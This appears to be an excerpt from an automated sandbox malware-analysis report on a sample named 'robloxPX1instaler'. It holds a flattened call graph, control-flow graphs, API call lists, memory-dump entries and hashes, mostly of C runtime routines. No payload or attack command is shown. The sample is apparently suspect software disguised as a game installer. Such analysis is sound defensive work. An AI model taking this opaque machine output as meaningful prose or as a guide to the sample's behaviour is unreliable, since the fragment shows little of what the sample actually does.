1515->1441 1517 b2a4dd ___free_lconv_mon 1516->1517 1518 b0e672 ___free_lconv_mon 12 API calls 1517->1518 1518->1515 1591 b29e87 1519->1591 1733 b23980 1524->1733 1527 b1463c 1529 b14646 IsProcessorFeaturePresent 1527->1529 1530 b14665 1527->1530 1531 b14652 1529->1531 1784 b2447d 1530->1784 1778 b0e378 1531->1778 1535 b146a9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 1535->1450 1537 b2caf8 1536->1537 1538 b2caf4 1536->1538 1537->1538 1543 b2c9ff 1537->1543 1538->1499 1538->1500 1541 b2cb12 GetProcAddress 1541->1538 1542 b2cb22 ___free_lconv_mon 1541->1542 1542->1538 1549 b2ca10 ___free_lconv_mon 1543->1549 1544 b2caa6 1544->1538 1544->1541 1545 b2ca2e LoadLibraryExW 1546 b2ca49 GetLastError 1545->1546 1547 b2caad 1545->1547 1546->1549 1547->1544 1548 b2cabf FreeLibrary 1547->1548 1548->1544 1549->1544 1549->1545 1550 b2ca7c LoadLibraryExW 1549->1550 1550->1547 1550->1549 1557 b3261a 1551->1557 1568 b2a316 GetLastError 1554->1568 1556 b0e677 1556->1504 1558 b32626 ___free_lconv_mon 1557->1558 1563 b24802 EnterCriticalSection 1558->1563 1560 b32631 1564 b3266d 1560->1564 1563->1560 1567 b2484a LeaveCriticalSection 1564->1567 1566 b325f8 1566->1506 1567->1566 1569 b2a332 1568->1569 1570 b2a32c 1568->1570 1572 b2cd5a ___free_lconv_mon 6 API calls 1569->1572 1574 b2a336 SetLastError 1569->1574 1571 b2cd1b ___free_lconv_mon 6 API calls 1570->1571 1571->1569 1573 b2a34e 1572->1573 1573->1574 1576 b2b99b ___free_lconv_mon 12 API calls 1573->1576 1574->1556 1577 b2a363 1576->1577 1578 b2a36b 1577->1578 1579 b2a37c 1577->1579 1580 b2cd5a ___free_lconv_mon 6 API calls 1578->1580 1581 b2cd5a ___free_lconv_mon 6 API calls 1579->1581 1583 b2a379 1580->1583 1582 b2a388 1581->1582 1584 b2a3a3 1582->1584 1585 b2a38c 1582->1585 1587 b2a4b0 ___free_lconv_mon 12 API calls 1583->1587 1588 b29ff3 ___free_lconv_mon 12 API calls 1584->1588 1586 b2cd5a ___free_lconv_mon 6 API calls 1585->1586 1586->1583 1587->1574 1589 b2a3ae 1588->1589 1590 b2a4b0 ___free_lconv_mon 12 API calls 1589->1590 1590->1574 1592 b29e93 ___free_lconv_mon 1591->1592 1605 b24802 EnterCriticalSection 1592->1605 1594 b29e9d 1606 b29ecd 1594->1606 1597 b29f99 1598 b29fa5 ___free_lconv_mon 1597->1598 1610 b24802 EnterCriticalSection 1598->1610 1600 b29faf 1611 b2a17a 1600->1611 1602 b29fc7 1615 b29fe7 1602->1615 1605->1594 1609 b2484a LeaveCriticalSection 1606->1609 1608 b29ebb 1608->1597 1609->1608 1610->1600 1612 b2a1b0 ___free_lconv_mon 1611->1612 1613 b2a189 ___free_lconv_mon 1611->1613 1612->1602 1613->1612 1618 b334ce 1613->1618 1732 b2484a LeaveCriticalSection 1615->1732 1617 b29fd5 1617->1468 1619 b3354e 1618->1619 1622 b334e4 1618->1622 1620 b3359c 1619->1620 1623 b2a4b0 ___free_lconv_mon 14 API calls 1619->1623 1686 b3363f 1620->1686 1622->1619 1624 b33517 1622->1624 1630 b2a4b0 ___free_lconv_mon 14 API calls 1622->1630 1625 b33570 1623->1625 1626 b33539 1624->1626 1631 b2a4b0 ___free_lconv_mon 14 API calls 1624->1631 1627 b2a4b0 ___free_lconv_mon 14 API calls 1625->1627 1629 b2a4b0 ___free_lconv_mon 14 API calls 1626->1629 1628 b33583 1627->1628 1632 b2a4b0 ___free_lconv_mon 14 API calls 1628->1632 1633 b33543 1629->1633 1635 b3350c 1630->1635 1637 b3352e 1631->1637 1638 b33591 1632->1638 1639 b2a4b0 ___free_lconv_mon 14 API calls 1633->1639 1634 b3360a 1640 b2a4b0 ___free_lconv_mon 14 API calls 1634->1640 1646 b327d2 1635->1646 1636 b335aa 1636->1634 1645 b2a4b0 14 API calls ___free_lconv_mon 1636->1645 1674 b32c86 1637->1674 1643 b2a4b0 ___free_lconv_mon 14 API calls 1638->1643 1639->1619 1644 b33610 1640->1644 1643->1620 1644->1612 1645->1636 1647 b327e3 1646->1647 1673 b328cc 1646->1673 1648 b2a4b0 ___free_lconv_mon 14 API calls 1647->1648 1651 b327f4 1647->1651 1648->1651 1649 b32806 1650 b32818 1649->1650 1653 b2a4b0 ___free_lconv_mon 14 API calls 1649->1653 1654 b3282a 1650->1654 1655 b2a4b0 ___free_lconv_mon 14 API calls 1650->1655 1651->1649 1652 b2a4b0 ___free_lconv_mon 14 API calls 1651->1652 1652->1649 1653->1650 1656 b3283c 1654->1656 1657 b2a4b0 ___free_lconv_mon 14 API calls 1654->1657 1655->1654 1658 b3284e 1656->1658 1660 b2a4b0 ___free_lconv_mon 14 API calls 1656->1660 1657->1656 1659 b32860 1658->1659 1661 b2a4b0 ___free_lconv_mon 14 API calls 1658->1661 1662 b32872 1659->1662 1663 b2a4b0 ___free_lconv_mon 14 API calls 1659->1663 1660->1658 1661->1659 1664 b32884 1662->1664 1665 b2a4b0 ___free_lconv_mon 14 API calls 1662->1665 1663->1662 1666 b32896 1664->1666 1668 b2a4b0 ___free_lconv_mon 14 API calls 1664->1668 1665->1664 1667 b328a8 1666->1667 1669 b2a4b0 ___free_lconv_mon 14 API calls 1666->1669 1670 b328ba 1667->1670 1671 b2a4b0 ___free_lconv_mon 14 API calls 1667->1671 1668->1666 1669->1667 1672 b2a4b0 ___free_lconv_mon 14 API calls 1670->1672 1670->1673 1671->1670 1672->1673 1673->1624 1675 b32c93 1674->1675 1685 b32ceb 1674->1685 1676 b32ca3 1675->1676 1677 b2a4b0 ___free_lconv_mon 14 API calls 1675->1677 1678 b2a4b0 ___free_lconv_mon 14 API calls 1676->1678 1682 b32cb5 1676->1682 1677->1676 1678->1682 1679 b2a4b0 ___free_lconv_mon 14 API calls 1680 b32cc7 1679->1680 1681 b32cd9 1680->1681 1683 b2a4b0 ___free_lconv_mon 14 API calls 1680->1683 1684 b2a4b0 ___free_lconv_mon 14 API calls 1681->1684 1681->1685 1682->1679 1682->1680 1683->1681 1684->1685 1685->1626 1687 b3366b 1686->1687 1688 b3364c 1686->1688 1687->1636 1688->1687 1692 b331a1 1688->1692 1691 b2a4b0 ___free_lconv_mon 14 API calls 1691->1687 1693 b3327f 1692->1693 1694 b331b2 1692->1694 1693->1691 1728 b32f00 1694->1728 1697 b32f00 ___free_lconv_mon 14 API calls 1698 b331c5 1697->1698 1699 b32f00 ___free_lconv_mon 14 API calls 1698->1699 1700 b331d0 1699->1700 1701 b32f00 ___free_lconv_mon 14 API calls 1700->1701 1702 b331db 1701->1702 1703 b32f00 ___free_lconv_mon 14 API calls 1702->1703 1704 b331e9 1703->1704 1705 b2a4b0 ___free_lconv_mon 14 API calls 1704->1705 1706 b331f4 1705->1706 1707 b2a4b0 ___free_lconv_mon 14 API calls 1706->1707 1708 b331ff 1707->1708 1709 b2a4b0 ___free_lconv_mon 14 API calls 1708->1709 1710 b3320a 1709->1710 1711 b32f00 ___free_lconv_mon 14 API calls 1710->1711 1712 b33218 1711->1712 1713 b32f00 ___free_lconv_mon 14 API calls 1712->1713 1714 b33226 1713->1714 1715 b32f00 ___free_lconv_mon 14 API calls 1714->1715 1716 b33237 1715->1716 1717 b32f00 ___free_lconv_mon 14 API calls 1716->1717 1718 b33245 1717->1718 1719 b32f00 ___free_lconv_mon 14 API calls 1718->1719 1720 b33253 1719->1720 1721 b2a4b0 ___free_lconv_mon 14 API calls 1720->1721 1722 b3325e 1721->1722 1723 b2a4b0 ___free_lconv_mon 14 API calls 1722->1723 1724 b33269 1723->1724 1725 b2a4b0 ___free_lconv_mon 14 API calls 1724->1725 1726 b33274 1725->1726 1727 b2a4b0 ___free_lconv_mon 14 API calls 1726->1727 1727->1693 1729 b32f12 1728->1729 1730 b32f21 1729->1730 1731 b2a4b0 ___free_lconv_mon 14 API calls 1729->1731 1730->1697 1731->1729 1732->1617 1787 b237b8 1733->1787 1736 b239c5 1737 b239d1 ___free_lconv_mon 1736->1737 1738 b2a316 ___free_lconv_mon 14 API calls 1737->1738 1742 b239fe 1737->1742 1745 b239f8 1737->1745 1738->1745 1739 b23a45 1741 b0e672 ___free_lconv_mon 14 API calls 1739->1741 1740 b23a2f 1740->1527 1743 b23a4a 1741->1743 1744 b23a71 1742->1744 1808 b24802 EnterCriticalSection 1742->1808 1805 b0e574 1743->1805 1749 b23ab3 1744->1749 1750 b23ba4 1744->1750 1760 b23ae2 1744->1760 1745->1739 1745->1740 1745->1742 1755 b2a1c5 43 API calls 1749->1755 1749->1760 1752 b23baf 1750->1752 1813 b2484a LeaveCriticalSection 1750->1813 1753 b2447d 23 API calls 1752->1753 1759 b23bb7 ___free_lconv_mon 1753->1759 1757 b23ad7 1755->1757 1756 b2a1c5 43 API calls 1761 b23b37 1756->1761 1758 b2a1c5 43 API calls 1757->1758 1758->1760 1762 b23c9e 1759->1762 1768 b23c09 1759->1768 1776 b23c18 1759->1776 1809 b23b51 1760->1809 1761->1740 1765 b2a1c5 43 API calls 1761->1765 1814 b24802 EnterCriticalSection 1762->1814 1765->1740 1766 b23cb2 1767 b23cc9 SetConsoleCtrlHandler 1766->1767 1772 b23cda ___free_lconv_mon 1766->1772 1769 b23ce3 GetLastError 1767->1769 1767->1772 1770 b2a316 ___free_lconv_mon 14 API calls 1768->1770 1768->1776 1815 b0e65f 1769->1815 1773 b23c23 1770->1773 1818 b23d55 1772->1818 1773->1776 1798 b2a4ea 1773->1798 1777 b23c69 1776->1777 1821 b2394f 1776->1821 1777->1527 1779 b0e394 1778->1779 1780 b0e3c0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 1779->1780 1783 b0e491 1780->1783 1781 b02f6a _ValidateLocalCookies 5 API calls 1782 b0e4af 1781->1782 1782->1530 1783->1781 1890 b242e4 1784->1890 1788 b237c4 ___free_lconv_mon 1787->1788 1793 b24802 EnterCriticalSection 1788->1793 1790 b237d2 1794 b23810 1790->1794 1793->1790 1797 b2484a LeaveCriticalSection 1794->1797 1796 b14631 1796->1527 1796->1736 1797->1796 1799 b2a528 1798->1799 1800 b2a4f8 ___free_lconv_mon 1798->1800 1802 b0e672 ___free_lconv_mon 14 API calls 1799->1802 1800->1799 1801 b2a513 RtlAllocateHeap 1800->1801 1804 b325ed ___free_lconv_mon 2 API calls 1800->1804 1801->1800 1803 b2a526 1801->1803 1802->1803 1803->1776 1804->1800 1825 b0e4c0 1805->1825 1808->1744 1810 b23b57 1809->1810 1811 b23b28 1809->1811 1888 b2484a LeaveCriticalSection 1810->1888 1811->1740 1811->1756 1811->1761 1813->1752 1814->1766 1816 b2a316 ___free_lconv_mon 14 API calls 1815->1816 1817 b0e664 1816->1817 1817->1772 1889 b2484a LeaveCriticalSection 1818->1889 1820 b23d5c 1820->1776 1822 b23975 1821->1822 1823 b2395c 1821->1823 1822->1777 1823->1822 1824 b0e672 ___free_lconv_mon 14 API calls 1823->1824 1824->1822 1826 b0e4d2 1825->1826 1831 b0e4f7 1826->1831 1828 b0e4ea 1842 b0e2b0 1828->1842 1832 b0e50e 1831->1832 1833 b0e507 1831->1833 1838 b0e51c 1832->1838 1852 b0e2ec 1832->1852 1848 b0e315 GetLastError 1833->1848 1836 b0e543 1836->1838 1855 b0e5a1 IsProcessorFeaturePresent 1836->1855 1838->1828 1839 b0e573 1840 b0e4c0 45 API calls 1839->1840 1841 b0e580 1840->1841 1841->1828 1843 b0e2bc 1842->1843 1844 b0e2d3 1843->1844 1881 b0e35b 1843->1881 1846 b0e2e6 1844->1846 1847 b0e35b 45 API calls 1844->1847 1846->1740 1847->1846 1849 b0e32e 1848->1849 1859 b2a3c7 1849->1859 1853 b0e310 1852->1853 1854 b0e2f7 GetLastError SetLastError 1852->1854 1853->1836 1854->1836 1856 b0e5ad 1855->1856 1857 b0e378 8 API calls 1856->1857 1858 b0e5c2 GetCurrentProcess TerminateProcess 1857->1858 1858->1839 1860 b2a3e0 1859->1860 1861 b2a3da 1859->1861 1863 b2cd5a ___free_lconv_mon 6 API calls 1860->1863 1880 b0e346 SetLastError 1860->1880 1862 b2cd1b ___free_lconv_mon 6 API calls 1861->1862 1862->1860 1864 b2a3fa 1863->1864 1865 b2b99b ___free_lconv_mon 14 API calls 1864->1865 1864->1880 1866 b2a40a 1865->1866 1867 b2a412 1866->1867 1868 b2a427 1866->1868 1870 b2cd5a ___free_lconv_mon 6 API calls 1867->1870 1869 b2cd5a ___free_lconv_mon 6 API calls 1868->1869 1871 b2a433 1869->1871 1872 b2a41e 1870->1872 1873 b2a446 1871->1873 1874 b2a437 1871->1874 1877 b2a4b0 ___free_lconv_mon 14 API calls 1872->1877 1876 b29ff3 ___free_lconv_mon 14 API calls 1873->1876 1875 b2cd5a ___free_lconv_mon 6 API calls 1874->1875 1875->1872 1878 b2a451 1876->1878 1877->1880 1879 b2a4b0 ___free_lconv_mon 14 API calls 1878->1879 1879->1880 1880->1832 1882 b0e365 1881->1882 1883 b0e36e 1881->1883 1884 b0e315 16 API calls 1882->1884 1883->1844 1885 b0e36a 1884->1885 1885->1883 1886 b1462c 45 API calls 1885->1886 1887 b0e377 1886->1887 1888->1811 1889->1820 1891 b24323 1890->1891 1892 b24311 1890->1892 1902 b241ac 1891->1902 1917 b03398 GetModuleHandleW 1892->1917 1897 b1466f GetSystemTimeAsFileTime 1897->1535 1900 b24375 1903 b241b8 ___free_lconv_mon 1902->1903 1925 b24802 EnterCriticalSection 1903->1925 1905 b241c2 1926 b241f9 1905->1926 1907 b241cf 1930 b241ed 1907->1930 1910 b2437b 1955 b243ac 1910->1955 1913 b24399 1915 b243ce 3 API calls 1913->1915 1914 b24389 GetCurrentProcess TerminateProcess 1914->1913 1916 b243a1 ExitProcess 1915->1916 1918 b033a4 1917->1918 1918->1891 1919 b243ce GetModuleHandleExW 1918->1919 1920 b2442e 1919->1920 1921 b2440d GetProcAddress 1919->1921 1922 b24434 FreeLibrary 1920->1922 1923 b24322 1920->1923 1921->1920 1924 b24421 1921->1924 1922->1923 1923->1891 1924->1920 1925->1905 1927 b24205 ___free_lconv_mon 1926->1927 1928 b2426c 1927->1928 1933 b27a3b 1927->1933 1928->1907 1954 b2484a LeaveCriticalSection 1930->1954 1932 b241db 1932->1897 1932->1910 1934 b27a47 __EH_prolog3 1933->1934 1937 b27793 1934->1937 1936 b27a6e 1936->1928 1938 b2779f ___free_lconv_mon 1937->1938 1945 b24802 EnterCriticalSection 1938->1945 1940 b277ad 1946 b2794b 1940->1946 1945->1940 1947 b277ba 1946->1947 1948 b2796a 1946->1948 1950 b277e2 1947->1950 1948->1947 1949 b2a4b0 ___free_lconv_mon 14 API calls 1948->1949 1949->1947 1953 b2484a LeaveCriticalSection 1950->1953 1952 b277cb 1952->1936 1953->1952 1954->1932 1960 b2d13c GetPEB 1955->1960 1958 b243b6 GetPEB 1959 b24385 1958->1959 1959->1913 1959->1914 1961 b2d156 1960->1961 1962 b243b1 1960->1962 1964 b2cb4d 1961->1964 1962->1958 1962->1959 1965 b2caca ___free_lconv_mon 5 API calls 1964->1965 1966 b2cb69 1965->1966 1966->1962 1968 b2caca ___free_lconv_mon 5 API calls 1967->1968 1969 b2cba9 1968->1969 1969->1486 1971 b2a316 ___free_lconv_mon 14 API calls 1970->1971 1973 b144ff 1971->1973 1972 b14541 ExitThread 1973->1972 1975 b14518 1973->1975 1979 b2d03e 1973->1979 1976 b1452b 1975->1976 1977 b14524 CloseHandle 1975->1977 1976->1972 1978 b14537 FreeLibraryAndExitThread 1976->1978 1977->1976 1978->1972 1980 b2caca ___free_lconv_mon 5 API calls 1979->1980 1981 b2d057 1980->1981 1981->1975 2008 b4d7fb 2009 b02f6a _ValidateLocalCookies 5 API calls 2008->2009 2010 b4d80e 2009->2010

                                                                                                  Callgraph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  • Opacity -> Relevance
                                                                                                  • Disassembly available
                                                                                                  callgraph 0 Function_00B0DFB0 17 Function_00B07490 0->17 1 Function_00B074B0 2 Function_00B0E2B0 106 Function_00B0E35B 2->106 3 Function_00B2A4B0 52 Function_00B0E5D5 3->52 87 Function_00B0E672 3->87 4 Function_00B29CB0 5 Function_00B3E0B0 6 Function_00B238B6 110 Function_00B2484A 6->110 7 Function_00B237B8 74 Function_00B23810 7->74 83 Function_00B24802 7->83 99 Function_00B03450 7->99 8 Function_00B4EBBF 97 Function_00B02F6A 8->97 9 Function_00B0DEA0 9->1 9->17 10 Function_00B0E5A1 93 Function_00B0E378 10->93 11 Function_00B331A1 11->3 85 Function_00B32F00 11->85 12 Function_00989680 13 Function_00B3E1AA 14 Function_00B241AC 37 Function_00B241F9 14->37 49 Function_00B241ED 14->49 14->83 14->99 15 Function_00B243AC 69 Function_00B2D13C 15->69 16 Function_00B0DF90 18 Function_00B27793 40 Function_00B277E2 18->40 18->83 18->99 111 Function_00B2794B 18->111 19 Function_00B3DF90 20 Function_00B03495 21 Function_00B03198 22 Function_00B03398 23 Function_00B2B99B 23->4 48 Function_00B325ED 23->48 23->87 24 Function_00B33699 88 Function_00B33670 24->88 25 Function_00B29F99 42 Function_00B29FE7 25->42 25->83 91 Function_00B2A17A 25->91 25->99 26 Function_00B23980 26->7 27 Function_00B29E87 61 Function_00B29ECD 27->61 27->83 27->99 28 Function_00B32C86 28->3 29 Function_00B2CB8D 58 Function_00B2CACA 29->58 30 Function_00B0DFF0 30->9 31 Function_00B03CF0 32 Function_00B29FF3 32->25 32->27 33 Function_00B3DFF0 33->5 33->19 34 Function_00B144F4 66 Function_00B2D03E 34->66 75 Function_00B2A316 34->75 35 Function_00B0E4F7 35->10 46 Function_00B0E2EC 35->46 54 Function_00B0E4C0 35->54 77 Function_00B0E315 35->77 36 Function_00B2D0F8 36->29 62 Function_00B28531 37->62 63 Function_00B27A3B 37->63 37->99 38 Function_00B2C9FF 109 Function_00B13142 38->109 39 Function_00B4D7FB 39->97 40->110 41 Function_00B034E2 41->20 42->110 43 Function_00B242E4 43->14 43->22 59 Function_00B243CE 43->59 94 Function_00B2437B 43->94 44 Function_00B238E5 45 Function_00B2A4EA 45->4 45->48 45->87 47 Function_00B072EC 78 Function_00B3261A 48->78 49->110 50 Function_00B0DFD0 51 Function_00B327D2 51->3 53 Function_00B131DC 53->3 54->2 54->35 96 Function_00B0E268 54->96 55 Function_00B2A3C7 55->3 55->23 55->32 79 Function_00B2CD1B 55->79 105 Function_00B2CD5A 55->105 56 Function_00B2A1C5 56->3 56->23 56->32 72 Function_00B1462C 56->72 56->79 56->105 57 Function_00B239C5 57->31 57->44 57->45 57->56 71 Function_00B23927 57->71 57->75 81 Function_00B2381C 57->81 57->83 57->87 89 Function_00B0E574 57->89 95 Function_00B2447D 57->95 57->99 103 Function_00B23B51 57->103 104 Function_00B23D55 57->104 107 Function_00B0E65F 57->107 57->110 112 Function_00B2394F 57->112 58->38 58->81 60 Function_00B334CE 60->3 60->28 60->51 65 Function_00B3363F 60->65 61->110 63->18 63->21 90 Function_00B03175 63->90 64 Function_00B2383B 64->6 64->83 64->99 65->3 65->11 66->58 67 Function_00B0343D 68 Function_00B1443F 68->36 68->56 82 Function_00B1461E 68->82 84 Function_00B2D003 68->84 68->99 113 Function_00B26E4C 68->113 114 Function_00B2CB4D 69->114 70 Function_00B02820 70->41 72->26 72->57 72->93 72->95 100 Function_00B02450 72->100 73 Function_00B06310 73->97 74->110 75->3 75->23 75->32 75->79 75->105 76 Function_00B33616 77->55 78->83 98 Function_00B3266D 78->98 78->99 79->58 80 Function_008A2120 82->34 84->58 85->3 86 Function_00B04270 87->75 89->54 91->24 91->60 102 Function_00B33451 91->102 92 Function_00B02F78 93->67 93->86 93->97 94->15 94->59 95->43 97->92 98->110 101 Function_00B06350 101->0 101->13 101->16 101->30 101->33 101->47 101->50 101->53 101->73 102->76 103->110 104->110 105->58 106->72 106->77 107->75 108 Function_00B0DF40 108->9 108->97 111->3 112->87 113->75 114->58

                                                                                                  Executed Functions

                                                                                                  Function 00B2D0F8 Relevance: .0, Instructions: 29COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 254 b2d0f8-b2d108 255 b2d137-b2d13b 254->255 256 b2d10a-b2d11b GetPEB 254->256 257 b2d12e-b2d135 256->257 258 b2d11d-b2d121 call b2cb8d 256->258 257->255 260 b2d126-b2d129 258->260 260->257 261 b2d12b-b2d12d 260->261 261->257
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1450278743.0000000000810000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1450897262.0000000000B58000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451042641.0000000000C40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451084594.0000000000C45000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451141891.0000000000CF0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451176737.0000000000CF8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D02000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D07000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D21000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000DA9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E86000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E8C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E92000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F9C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000FED000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000103F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001090000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000010E1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001132000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001183000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000011D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001225000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001276000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000012C8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001319000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000136A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000013BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000191E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000195E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001961000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1453134631.0000000001963000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ab57a412ecfaf76c50045dacf294404439d98aaa4740bf0a0d07b7cf031cd47b
                                                                                                  • Instruction ID: 31295c00978da693f4a8354fb33df6d5a4351890e36ac6e31bfbd58454ee4f3b
                                                                                                  • Opcode Fuzzy Hash: ab57a412ecfaf76c50045dacf294404439d98aaa4740bf0a0d07b7cf031cd47b
                                                                                                  • Instruction Fuzzy Hash: A0F06532611334EBCB26CB5CD509A99B3FDEB49B61F114096F505EB590C6B0DD00C7D0
                                                                                                  Function 00B2C9FF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 b2c9ff-b2ca0b 1 b2ca9d-b2caa0 0->1 2 b2ca10-b2ca21 1->2 3 b2caa6 1->3 5 b2ca23-b2ca26 2->5 6 b2ca2e-b2ca47 LoadLibraryExW 2->6 4 b2caa8-b2caac 3->4 7 b2cac6-b2cac8 5->7 8 b2ca2c 5->8 9 b2ca49-b2ca52 GetLastError 6->9 10 b2caad-b2cabd 6->10 7->4 12 b2ca9a 8->12 13 b2ca54-b2ca66 call b13142 9->13 14 b2ca8b-b2ca98 9->14 10->7 11 b2cabf-b2cac0 FreeLibrary 10->11 11->7 12->1 13->14 17 b2ca68-b2ca7a call b13142 13->17 14->12 17->14 20 b2ca7c-b2ca89 LoadLibraryExW 17->20 20->10 20->14
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,38E2E45B,?,00B2CB0C,?,?,?,00000000), ref: 00B2CAC0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1450278743.0000000000810000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1450897262.0000000000B58000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451042641.0000000000C40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451084594.0000000000C45000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451141891.0000000000CF0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451176737.0000000000CF8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D02000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D07000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D21000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000DA9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E86000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E8C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E92000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F9C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000FED000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000103F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001090000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000010E1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001132000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001183000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000011D4000.00000004.00000001.01000000.00000006.sdmpDownload File
